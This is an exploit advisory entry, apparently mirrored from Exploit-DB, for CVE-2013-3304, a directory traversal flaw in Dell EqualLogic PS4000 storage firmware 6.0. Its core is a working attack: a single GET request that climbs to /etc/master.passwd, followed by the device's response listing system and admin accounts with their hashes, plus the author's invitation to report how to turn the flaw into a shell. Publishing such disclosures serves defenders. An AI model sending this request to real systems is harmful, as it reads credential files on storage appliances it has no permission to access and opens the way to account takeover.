Remote Directory Traversal exploit for Dell EqualLogic 6.0 Storage

vendor:

EqualLogic PS4000

by:

Mauricio Pampim Corr�a

8,8

CVSS

HIGH

Directory Traversal

CWE

Product Name: EqualLogic PS4000

Affected Version From: 6.0

Affected Version To: 6.0

Patch Exists: YES

Related CWE: CVE-2013-3304

CPE: o:dell:equal_logic_ps4000

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2013

Remote Directory Traversal exploit for Dell EqualLogic 6.0 Storage

A malicious user sends a GET request to the Dell Storage with a directory traversal string, and the Dell Storage responds with a list of users and their respective hashes.

Mitigation:

Ensure that the web application is not vulnerable to directory traversal attacks by validating user input and sanitizing it.

Source

Exploit-DB raw data:

# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corr�a
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304

 

The malicious user sends

 

GET //../../../../../../../../etc/master.passwd

 

 

 

And the Dell Storage answers

 

root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin

 

 

More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50

 

Could obtain shell with flaw? send me an email telling me how, to
mauricio[at]xlabs.com.br

 

Thanks